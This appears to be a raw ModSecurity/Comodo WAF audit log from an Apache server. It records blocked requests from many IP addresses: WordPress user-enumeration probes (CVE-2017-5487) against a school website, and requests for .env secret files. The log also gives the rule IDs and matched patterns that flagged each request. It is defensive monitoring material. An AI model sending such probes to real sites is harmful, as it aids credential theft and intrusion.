3162 (- - -) Stopwatch2: 1748816340826780 3162; combined=1341, p1=451, p2=860, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c683f73e-Z-- --36c0fb1c-A-- [02/Jun/2025:05:45:54 +0700] aDzYIn8VMK8tZef_-m_JigAAAE0 103.236.140.4 52436 103.236.140.4 8181 --36c0fb1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.123.207.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.123.207.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --36c0fb1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36c0fb1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748817954175911 3626 (- - -) Stopwatch2: 1748817954175911 3626; combined=1599, p1=547, p2=1013, p3=0, p4=0, p5=39, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36c0fb1c-Z-- --879ec623-A-- [02/Jun/2025:06:24:51 +0700] aDzhQ38VMK8tZef_-m_JpAAAAEw 103.236.140.4 52696 103.236.140.4 8181 --879ec623-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.2.194.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.2.194.82 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --879ec623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --879ec623-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748820291437589 2302 (- - -) Stopwatch2: 1748820291437589 2302; combined=1078, p1=332, p2=714, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --879ec623-Z-- --70771c58-A-- [02/Jun/2025:06:41:08 +0700] aDzlFO6eDjh4wF4csdtiRQAAAJI 103.236.140.4 52760 103.236.140.4 8181 --70771c58-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.67.184.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.67.184.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70771c58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70771c58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748821268749276 2904 (- - -) Stopwatch2: 1748821268749276 2904; combined=1305, p1=428, p2=847, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70771c58-Z-- --cb45a622-A-- [02/Jun/2025:07:08:08 +0700] aDzraO6eDjh4wF4csdtj3wAAAI4 103.236.140.4 58864 103.236.140.4 8181 --cb45a622-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 91.227.106.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.227.106.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb45a622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb45a622-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748822888231826 3109 (- - -) Stopwatch2: 1748822888231826 3109; combined=1419, p1=506, p2=885, p3=0, p4=0, p5=28, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb45a622-Z-- --b40f2e59-A-- [02/Jun/2025:07:16:59 +0700] aDzteu6eDjh4wF4csdtkbwAAAIE 103.236.140.4 33712 103.236.140.4 8181 --b40f2e59-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36 Accept-Charset: utf-8 --b40f2e59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b40f2e59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748823418999689 805 (- - -) Stopwatch2: 1748823418999689 805; combined=320, p1=279, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b40f2e59-Z-- --ce232040-A-- [02/Jun/2025:07:55:32 +0700] aDz2hEA6be0-boUGPH17gQAAANA 103.236.140.4 34060 103.236.140.4 8181 --ce232040-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.101.72.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.101.72.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ce232040-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce232040-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748825732586186 2497 (- - -) Stopwatch2: 1748825732586186 2497; combined=1079, p1=368, p2=682, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce232040-Z-- --4412b74e-A-- [02/Jun/2025:09:13:36 +0700] aD0I0O6eDjh4wF4csdtk8QAAAIU 103.236.140.4 34444 103.236.140.4 8181 --4412b74e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.61.106.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.61.106.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4412b74e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4412b74e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748830416229839 2128 (- - -) Stopwatch2: 1748830416229839 2128; combined=1058, p1=331, p2=700, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4412b74e-Z-- --10130775-A-- [02/Jun/2025:09:22:26 +0700] aD0K4u6eDjh4wF4csdtk_QAAAIQ 103.236.140.4 34516 103.236.140.4 8181 --10130775-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.56.213.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.56.213.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --10130775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10130775-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748830946251211 3566 (- - -) Stopwatch2: 1748830946251211 3566; combined=1532, p1=545, p2=954, p3=0, p4=0, p5=32, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10130775-Z-- --49259e55-A-- [02/Jun/2025:09:41:18 +0700] aD0PTkA6be0-boUGPH174wAAAM4 103.236.140.4 35522 103.236.140.4 8181 --49259e55-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.127.220.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.127.220.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --49259e55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49259e55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748832078009966 3163 (- - -) Stopwatch2: 1748832078009966 3163; combined=1349, p1=378, p2=938, p3=0, p4=0, p5=32, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49259e55-Z-- --51e9f85c-A-- [02/Jun/2025:09:54:52 +0700] aD0SfEA6be0-boUGPH19LwAAANg 103.236.140.4 40888 103.236.140.4 8181 --51e9f85c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.67.184.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.67.184.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --51e9f85c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51e9f85c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748832892057546 2417 (- - -) Stopwatch2: 1748832892057546 2417; combined=1099, p1=345, p2=727, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51e9f85c-Z-- --b617964e-A-- [02/Jun/2025:10:22:00 +0700] aD0Y2EA6be0-boUGPH19PwAAAMI 103.236.140.4 41078 103.236.140.4 8181 --b617964e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.249.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.249.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b617964e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b617964e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748834520905895 3515 (- - -) Stopwatch2: 1748834520905895 3515; combined=1483, p1=497, p2=954, p3=0, p4=0, p5=31, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b617964e-Z-- --c29b174b-A-- [02/Jun/2025:11:15:53 +0700] aD0leX8VMK8tZef_-m_N4AAAAEM 103.236.140.4 41758 103.236.140.4 8181 --c29b174b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.236.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.236.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c29b174b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c29b174b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748837753011347 862 (- - -) Stopwatch2: 1748837753011347 862; combined=378, p1=340, p2=0, p3=0, p4=0, p5=38, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c29b174b-Z-- --9816e374-A-- [02/Jun/2025:11:40:46 +0700] aD0rTn8VMK8tZef_-m_bAwAAAFQ 103.236.140.4 39254 103.236.140.4 8181 --9816e374-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.32 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.32 Epiphany/3.8.2 Accept-Charset: utf-8 --9816e374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9816e374-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748839246918507 786 (- - -) Stopwatch2: 1748839246918507 786; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9816e374-Z-- --4d1f2c0a-A-- [02/Jun/2025:11:55:53 +0700] aD0u2e6eDjh4wF4csdt7bQAAAIM 103.236.140.4 57612 103.236.140.4 8181 --4d1f2c0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.78.81.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.78.81.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d1f2c0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d1f2c0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748840153193242 3359 (- - -) Stopwatch2: 1748840153193242 3359; combined=1489, p1=472, p2=982, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d1f2c0a-Z-- --19b59d06-A-- [02/Jun/2025:12:15:54 +0700] aD0ziu6eDjh4wF4csdt7dwAAAJM 103.236.140.4 57742 103.236.140.4 8181 --19b59d06-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.71.175.236 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.71.175.236 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --19b59d06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19b59d06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748841354856920 850 (- - -) Stopwatch2: 1748841354856920 850; combined=334, p1=299, p2=0, p3=0, p4=0, p5=34, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19b59d06-Z-- --0091804f-A-- [02/Jun/2025:12:31:42 +0700] aD03Pn8VMK8tZef_-m_gSwAAAFc 103.236.140.4 57892 103.236.140.4 8181 --0091804f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.230.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.230.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0091804f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0091804f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748842302079105 3084 (- - -) Stopwatch2: 1748842302079105 3084; combined=1321, p1=452, p2=834, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0091804f-Z-- --7f4adc01-A-- [02/Jun/2025:12:46:56 +0700] aD060NG4Cudp_oIcbnO6pwAAAAg 103.236.140.4 58016 103.236.140.4 8181 --7f4adc01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.216.50.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.216.50.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7f4adc01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f4adc01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748843216631304 2987 (- - -) Stopwatch2: 1748843216631304 2987; combined=1358, p1=427, p2=898, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
